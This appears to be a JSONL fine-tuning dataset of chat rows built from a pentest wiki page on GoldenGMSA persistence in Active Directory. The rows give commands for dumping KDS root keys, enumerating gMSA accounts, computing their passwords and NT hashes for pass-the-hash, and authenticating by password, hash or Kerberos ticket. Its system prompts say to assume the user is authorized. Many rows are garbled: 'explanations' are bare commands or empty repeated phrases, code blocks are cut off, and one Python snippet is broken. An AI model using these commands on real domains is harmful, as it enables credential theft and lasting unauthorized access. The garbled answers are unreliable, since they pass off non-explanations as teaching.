root key extraction and gMSA password computation from Linux-based platforms without Windows-specific dependencies.\n\nKDS root keys can be exfiltrated with high-privileged access. Multiple authentication methods are supported:\n\n``bash"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform GoldenGMSA - Obtaining persistence?", "response": "Once an AD environment is compromised, acquiring the \"GoldenGMSA\" persistence requires to dump the KDS root keys.\n\n::: tabs\n\n=== Windows\n\nThe KDS (Key Distribution Service) root keys can be exfiltrated from the domain with high-privileged access with GoldenGMSA (C#).\n\nWithout the --forest argument, the forest root domain is queried, hence requiring Enterprise Admins or Domain Admins privileges in the forest root domain, or SYSTEM privileges on a forest root Domain Controller.\n\n``powershell\nGoldenGMSA.exe kdsinfo\n`\n\nWith the --forest argument specifying the target domain or forest, SYSTEM privileges are required on the corresponding domain or forest Domain Controller. In case a child domain is specified, the parent domain keys will be dumped as well.\n\n`powershell\nGoldenGMSA.exe kdsinfo --forest child.lab.local\n`\n\n=== UNIX-like\n\npyGoldenGMSA (Python) implements the cryptographic pipeline in Python, enabling KDS root key extraction and gMSA password computation from Linux-based platforms without Windows-specific dependencies.\n\nKDS root keys can be exfiltrated with high-privileged access. Multiple authentication methods are supported:\n\n``bash", "metadata": {"corpus_index": 1202, "category": "active_directory", "source_file": "docs/src/ad/persistence/goldengmsa.md", "page_title": "GoldenGMSA", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "How do I use GoldenGMSA.exe for goldengmsa - obtaining persistence?"}, {"role": "assistant", "content": "GoldenGMSA.exe kdsinfo"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "How do I use GoldenGMSA.exe for goldengmsa - obtaining persistence?", "response": "GoldenGMSA.exe kdsinfo", "metadata": {"corpus_index": 1203, "category": "active_directory", "source_file": "docs/src/ad/persistence/goldengmsa.md", "page_title": "GoldenGMSA", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "GoldenGMSA.exe"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out GoldenGMSA - Obtaining persistence during a pentest?"}, {"role": "assistant", "content": "GoldenGMSA.exe kdsinfo"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out GoldenGMSA - Obtaining persistence during a pentest?", "response": "GoldenGMSA.exe kdsinfo", "metadata": {"corpus_index": 1203, "category": "active_directory", "source_file": "docs/src/ad/persistence/goldengmsa.md", "page_title": "GoldenGMSA", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `GoldenGMSA.exe kdsinfo`?"}, {"role": "assistant", "content": "This command is used for goldengmsa - obtaining persistence. Obtaining persistence"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `GoldenGMSA.exe kdsinfo`?", "response": "This command is used for goldengmsa - obtaining persistence. Obtaining persistence", "metadata": {"corpus_index": 1203, "category": "active_directory", "source_file": "docs/src/ad/persistence/goldengmsa.md", "page_title": "GoldenGMSA", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "How do I use GoldenGMSA.exe for goldengmsa - obtaining persistence?"}, {"role": "assistant", "content": "GoldenGMSA.exe kdsinfo --forest child.lab.local"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "How do I use GoldenGMSA.exe for goldengmsa - obtaining persistence?", "response": "GoldenGMSA.exe kdsinfo --forest child.lab.local", "metadata": {"corpus_index": 1204, "category": "active_directory", "source_file": "docs/src/ad/persistence/goldengmsa.md", "page_title": "GoldenGMSA", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "GoldenGMSA.exe"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do GoldenGMSA - Obtaining persistence"}, {"role": "assistant", "content": "GoldenGMSA.exe kdsinfo --forest child.lab.local"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do GoldenGMSA - Obtaining persistence", "response": "GoldenGMSA.exe kdsinfo --forest child.lab.local", "metadata": {"corpus_index": 1204, "category": "active_directory", "source_file": "docs/src/ad/persistence/goldengmsa.md", "page_title": "GoldenGMSA", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `GoldenGMSA.exe kdsinfo --forest child.lab.local`?"}, {"role": "assistant", "content": "This command is used for goldengmsa - obtaining persistence. Obtaining persistence"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `GoldenGMSA.exe kdsinfo --forest child.lab.local`?", "response": "This command is used for goldengmsa - obtaining persistence. Obtaining persistence", "metadata": {"corpus_index": 1204, "category": "active_directory", "source_file": "docs/src/ad/persistence/goldengmsa.md", "page_title": "GoldenGMSA", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Tell me about Password authentication"}, {"role": "assistant", "content": "python3 main.py -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" -d $DOMAIN --dc-ip $DC_IP kdsinfo"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Tell me about Password authentication", "response": "python3 main.py -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" -d $DOMAIN --dc-ip $DC_IP kdsinfo", "metadata": {"corpus_index": 1205, "category": "active_directory", "source_file": "docs/src/ad/persistence/goldengmsa.md", "page_title": "GoldenGMSA", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for Password authentication?"}, {"role": "assistant", "content": "python3 main.py -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" -d $DOMAIN --dc-ip $DC_IP kdsinfo"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for Password authentication?", "response": "python3 main.py -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" -d $DOMAIN --dc-ip $DC_IP kdsinfo", "metadata": {"corpus_index": 1205, "category": "active_directory", "source_file": "docs/src/ad/persistence/goldengmsa.md", "page_title": "GoldenGMSA", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of Pass-the-Hash authentication"}, {"role": "assistant", "content": "python3 main.py -u \"$USER\" -d $DOMAIN --dc-ip $DC_IP --nt-hash $NT_HASH kdsinfo"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of Pass-the-Hash authentication", "response": "python3 main.py -u \"$USER\" -d $DOMAIN --dc-ip $DC_IP --nt-hash $NT_HASH kdsinfo", "metadata": {"corpus_index": 1206, "category": "active_directory", "source_file": "docs/src/ad/persistence/goldengmsa.md", "page_title": "GoldenGMSA", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for Pass-the-Hash authentication?"}, {"role": "assistant", "content": "python3 main.py -u \"$USER\" -d $DOMAIN --dc-ip $DC_IP --nt-hash $NT_HASH kdsinfo"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for Pass-the-Hash authentication?", "response": "python3 main.py -u \"$USER\" -d $DOMAIN --dc-ip $DC_IP --nt-hash $NT_HASH kdsinfo", "metadata": {"corpus_index": 1206, "category": "active_directory", "source_file": "docs/src/ad/persistence/goldengmsa.md", "page_title": "GoldenGMSA", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of Pass-the-Ticket (Kerberos) authentication"}, {"role": "assistant", "content": "python3 main.py -u \"$USER\" -d $DOMAIN --dc-ip $DC_IP --ccache admin.ccache kdsinfo\n```\n\nThe dumped KDS root keys are printed in base64, and can be used for password calculation later on.\n\n:::"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of Pass-the-Ticket (Kerberos) authentication", "response": "python3 main.py -u \"$USER\" -d $DOMAIN --dc-ip $DC_IP --ccache admin.ccache kdsinfo\n```\n\nThe dumped KDS root keys are printed in base64, and can be used for password calculation later on.\n\n:::", "metadata": {"corpus_index": 1207, "category": "active_directory", "source_file": "docs/src/ad/persistence/goldengmsa.md", "page_title": "GoldenGMSA", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on Pass-the-Ticket (Kerberos) authentication"}, {"role": "assistant", "content": "python3 main.py -u \"$USER\" -d $DOMAIN --dc-ip $DC_IP --ccache admin.ccache kdsinfo\n```\n\nThe dumped KDS root keys are printed in base64, and can be used for password calculation later on.\n\n:::"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on Pass-the-Ticket (Kerberos) authentication", "response": "python3 main.py -u \"$USER\" -d $DOMAIN --dc-ip $DC_IP --ccache admin.ccache kdsinfo\n```\n\nThe dumped KDS root keys are printed in base64, and can be used for password calculation later on.\n\n:::", "metadata": {"corpus_index": 1207, "category": "active_directory", "source_file": "docs/src/ad/persistence/goldengmsa.md", "page_title": "GoldenGMSA", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does GoldenGMSA - Retrieving gMSA passwords work?"}, {"role": "assistant", "content": "Later on, the attacker can then, with low-privileged access to the domain:\n\n1. dump some information relative to the gMSA account to retrieve the password for\n2. use those elements to calculate the gMSA password"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "How does GoldenGMSA - Retrieving gMSA passwords work?", "response": "Later on, the attacker can then, with low-privileged access to the domain:\n\n1. dump some information relative to the gMSA account to retrieve the password for\n2. use those elements to calculate the gMSA password", "metadata": {"corpus_index": 1208, "category": "active_directory", "source_file": "docs/src/ad/persistence/goldengmsa.md", "page_title": "GoldenGMSA", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on GoldenGMSA - Retrieving gMSA passwords"}, {"role": "assistant", "content": "Later on, the attacker can then, with low-privileged access to the domain:\n\n1. dump some information relative to the gMSA account to retrieve the password for\n2. use those elements to calculate the gMSA password"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on GoldenGMSA - Retrieving gMSA passwords", "response": "Later on, the attacker can then, with low-privileged access to the domain:\n\n1. dump some information relative to the gMSA account to retrieve the password for\n2. use those elements to calculate the gMSA password", "metadata": {"corpus_index": 1208, "category": "active_directory", "source_file": "docs/src/ad/persistence/goldengmsa.md", "page_title": "GoldenGMSA", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Tell me about GoldenGMSA - Account information dump"}, {"role": "assistant", "content": "::: tabs\n\n=== Windows\n\nIn addition to the KDS root keys, the following information, relative to a gMSA, need to be dumped in order to compute its password:\n\n* SID (Security IDentifier)\n* RootKeyGuid: indicating what KDS root key to use\n* Password ID: which rotates regularly\n\nThe information can be dumped with low-privilege access to AD with GoldenGMSA (C#).\n\n``powershell\nGoldenGMSA.exe gmsainfo\n`\n\nIn order to dump the necessary information of a single gMSA, its SID can be used as filter with the --sid argument.\n\n`powershell\nGoldenGMSA.exe gmsainfo --sid \"S-1-5-21-[...]1586295871-1112\"\n`\n\n=== UNIX-like\n\npyGoldenGMSA can enumerate gMSA accounts and extract the required information (SID, RootKeyGuid, Password ID, and L0/L1/L2 indices) with low-privilege access:\n\n``bash"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Tell me about GoldenGMSA - Account information dump", "response": "::: tabs\n\n=== Windows\n\nIn addition to the KDS root keys, the following information, relative to a gMSA, need to be dumped in order to compute its password:\n\n* SID (Security IDentifier)\n* RootKeyGuid: indicating what KDS root key to use\n* Password ID: which rotates regularly\n\nThe information can be dumped with low-privilege access to AD with GoldenGMSA (C#).\n\n``powershell\nGoldenGMSA.exe gmsainfo\n`\n\nIn order to dump the necessary information of a single gMSA, its SID can be used as filter with the --sid argument.\n\n`powershell\nGoldenGMSA.exe gmsainfo --sid \"S-1-5-21-[...]1586295871-1112\"\n`\n\n=== UNIX-like\n\npyGoldenGMSA can enumerate gMSA accounts and extract the required information (SID, RootKeyGuid, Password ID, and L0/L1/L2 indices) with low-privilege access:\n\n``bash", "metadata": {"corpus_index": 1209, "category": "active_directory", "source_file": "docs/src/ad/persistence/goldengmsa.md", "page_title": "GoldenGMSA", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on GoldenGMSA - Account information dump"}, {"role": "assistant", "content": "::: tabs\n\n=== Windows\n\nIn addition to the KDS root keys, the following information, relative to a gMSA, need to be dumped in order to compute its password:\n\n* SID (Security IDentifier)\n* RootKeyGuid: indicating what KDS root key to use\n* Password ID: which rotates regularly\n\nThe information can be dumped with low-privilege access to AD with GoldenGMSA (C#).\n\n``powershell\nGoldenGMSA.exe gmsainfo\n`\n\nIn order to dump the necessary information of a single gMSA, its SID can be used as filter with the --sid argument.\n\n`powershell\nGoldenGMSA.exe gmsainfo --sid \"S-1-5-21-[...]1586295871-1112\"\n`\n\n=== UNIX-like\n\npyGoldenGMSA can enumerate gMSA accounts and extract the required information (SID, RootKeyGuid, Password ID, and L0/L1/L2 indices) with low-privilege access:\n\n``bash"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on GoldenGMSA - Account information dump", "response": "::: tabs\n\n=== Windows\n\nIn addition to the KDS root keys, the following information, relative to a gMSA, need to be dumped in order to compute its password:\n\n* SID (Security IDentifier)\n* RootKeyGuid: indicating what KDS root key to use\n* Password ID: which rotates regularly\n\nThe information can be dumped with low-privilege access to AD with GoldenGMSA (C#).\n\n``powershell\nGoldenGMSA.exe gmsainfo\n`\n\nIn order to dump the necessary information of a single gMSA, its SID can be used as filter with the --sid argument.\n\n`powershell\nGoldenGMSA.exe gmsainfo --sid \"S-1-5-21-[...]1586295871-1112\"\n`\n\n=== UNIX-like\n\npyGoldenGMSA can enumerate gMSA accounts and extract the required information (SID, RootKeyGuid, Password ID, and L0/L1/L2 indices) with low-privilege access:\n\n``bash", "metadata": {"corpus_index": 1209, "category": "active_directory", "source_file": "docs/src/ad/persistence/goldengmsa.md", "page_title": "GoldenGMSA", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Give me the GoldenGMSA.exe command to goldengmsa - account information dump"}, {"role": "assistant", "content": "GoldenGMSA.exe gmsainfo"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Give me the GoldenGMSA.exe command to goldengmsa - account information dump", "response": "GoldenGMSA.exe gmsainfo", "metadata": {"corpus_index": 1210, "category": "active_directory", "source_file": "docs/src/ad/persistence/goldengmsa.md", "page_title": "GoldenGMSA", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "GoldenGMSA.exe"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through GoldenGMSA - Account information dump"}, {"role": "assistant", "content": "GoldenGMSA.exe gmsainfo"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through GoldenGMSA - Account information dump", "response": "GoldenGMSA.exe gmsainfo", "metadata": {"corpus_index": 1210, "category": "active_directory", "source_file": "docs/src/ad/persistence/goldengmsa.md", "page_title": "GoldenGMSA", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `GoldenGMSA.exe gmsainfo`?"}, {"role": "assistant", "content": "This command is used for goldengmsa - account information dump. Account information dump"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `GoldenGMSA.exe gmsainfo`?", "response": "This command is used for goldengmsa - account information dump. Account information dump", "metadata": {"corpus_index": 1210, "category": "active_directory", "source_file": "docs/src/ad/persistence/goldengmsa.md", "page_title": "GoldenGMSA", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Show me the GoldenGMSA.exe command for goldengmsa - account information dump"}, {"role": "assistant", "content": "GoldenGMSA.exe gmsainfo --sid \"S-1-5-21-[...]1586295871-1112\""}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Show me the GoldenGMSA.exe command for goldengmsa - account information dump", "response": "GoldenGMSA.exe gmsainfo --sid \"S-1-5-21-[...]1586295871-1112\"", "metadata": {"corpus_index": 1211, "category": "active_directory", "source_file": "docs/src/ad/persistence/goldengmsa.md", "page_title": "GoldenGMSA", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "GoldenGMSA.exe"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for GoldenGMSA - Account information dump"}, {"role": "assistant", "content": "GoldenGMSA.exe gmsainfo --sid \"S-1-5-21-[...]1586295871-1112\""}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for GoldenGMSA - Account information dump", "response": "GoldenGMSA.exe gmsainfo --sid \"S-1-5-21-[...]1586295871-1112\"", "metadata": {"corpus_index": 1211, "category": "active_directory", "source_file": "docs/src/ad/persistence/goldengmsa.md", "page_title": "GoldenGMSA", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `GoldenGMSA.exe gmsainfo --sid \"S-1-5-21-[...]1586295871-1112\"`?"}, {"role": "assistant", "content": "This command is used for goldengmsa - account information dump. Account information dump"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `GoldenGMSA.exe gmsainfo --sid \"S-1-5-21-[...]1586295871-1112\"`?", "response": "This command is used for goldengmsa - account information dump. Account information dump", "metadata": {"corpus_index": 1211, "category": "active_directory", "source_file": "docs/src/ad/persistence/goldengmsa.md", "page_title": "GoldenGMSA", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What is Enumerate all gMSA accounts?"}, {"role": "assistant", "content": "python3 main.py -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" -d $DOMAIN --dc-ip $DC_IP gmsainfo"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What is Enumerate all gMSA accounts?", "response": "python3 main.py -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" -d $DOMAIN --dc-ip $DC_IP gmsainfo", "metadata": {"corpus_index": 1212, "category": "active_directory", "source_file": "docs/src/ad/persistence/goldengmsa.md", "page_title": "GoldenGMSA", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for Enumerate all gMSA accounts?"}, {"role": "assistant", "content": "python3 main.py -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" -d $DOMAIN --dc-ip $DC_IP gmsainfo"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for Enumerate all gMSA accounts?", "response": "python3 main.py -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" -d $DOMAIN --dc-ip $DC_IP gmsainfo", "metadata": {"corpus_index": 1212, "category": "active_directory", "source_file": "docs/src/ad/persistence/goldengmsa.md", "page_title": "GoldenGMSA", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about Enumerate a specific gMSA by SID?"}, {"role": "assistant", "content": "python3 main.py -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" -d $DOMAIN --dc-ip $DC_IP gmsainfo --sid \"$GMSA_SID\"\n```\n\nThe tool outputs the account name, SID, root key GUID, and indices required for password computation.\n\n:::"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about Enumerate a specific gMSA by SID?", "response": "python3 main.py -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" -d $DOMAIN --dc-ip $DC_IP gmsainfo --sid \"$GMSA_SID\"\n```\n\nThe tool outputs the account name, SID, root key GUID, and indices required for password computation.\n\n:::", "metadata": {"corpus_index": 1213, "category": "active_directory", "source_file": "docs/src/ad/persistence/goldengmsa.md", "page_title": "GoldenGMSA", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on Enumerate a specific gMSA by SID"}, {"role": "assistant", "content": "python3 main.py -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" -d $DOMAIN --dc-ip $DC_IP gmsainfo --sid \"$GMSA_SID\"\n```\n\nThe tool outputs the account name, SID, root key GUID, and indices required for password computation.\n\n:::"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on Enumerate a specific gMSA by SID", "response": "python3 main.py -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" -d $DOMAIN --dc-ip $DC_IP gmsainfo --sid \"$GMSA_SID\"\n```\n\nThe tool outputs the account name, SID, root key GUID, and indices required for password computation.\n\n:::", "metadata": {"corpus_index": 1213, "category": "active_directory", "source_file": "docs/src/ad/persistence/goldengmsa.md", "page_title": "GoldenGMSA", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about GoldenGMSA - Password calculation?"}, {"role": "assistant", "content": "::: tabs\n\n=== Windows\n\nGiven a gMSA SID, the corresponding KDS root key (matching the RootKeyGuid obtained beforehand), and the Password ID, the actual plaintext password can be calculated with GoldenGMSA (C#).\n\n``powershell\nGoldenGMSA.exe compute --sid \"S-1-5-21-[...]1586295871-1112\" --kdskey \"AQA[...]jG2/M=\" --pwdid \"AQAAAEtEU[...]gBsAGEAYgBzAAAA\"\n`\n\nSince the password is randomly generated and is not intended to be used by real users with a keyboard (but instead by servers, programs, scripts, etc.) the password is very long, complex and can include non-printable characters. GoldenGMSA will output the password in base64.\n\nIn order to use the password, its MD4 (i.e. NT) hash can be calculated, for pass the hash.\n\n`python\nimport base64\nimport hashlib\n\nb64 = input(\"Password Base64: \")\n\nprint(\"NT hash:\", hashlib.new(\"md4\", base64.b64decode()).hexdigest())\n`\n\n=== UNIX-like\n\npyGoldenGMSA can compute gMSA passwords either online (requiring network access to the DC) or offline (using previously dumped KDS root keys), making it particularly useful for persistence scenarios where the attacker may not have continuous access to the domain.\n\nOnline computation (automatically retrieves KDS root key and password ID from the DC):\n\n`bash\npython3 main.py -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" -d $DOMAIN --dc-ip $DC_IP compute --sid $GMSA_SID\n`\n\nOffline computation (no network access required, using previously dumped KDS root key and password ID):\n\n`bash\npython3 main.py compute --sid $GMSA_SID --kdskey \"AQAAAOlMCM5U37Qv......\" --pwdid \"AQAAAEtEU0sC......\"\n`\n\nUnlike the Windows tool, pyGoldenGMSA outputs the NT hash directly in both NT-only format and nxc format, eliminating the need for manual hash conversion:\n\n`\nNT hash: 1c368c74ef1bcbd4892c95a8d6de0f30\nLM:NT format: aad3b435b51404eeaad3b435b51404ee:1c368c74ef1bcbd4892c95a8d6de0f30\n`\n\n:::\n\n> [!TIP]\n> Both GoldenGMSA (C#) and pyGoldenGMSA (Python) tools featured in this recipe can 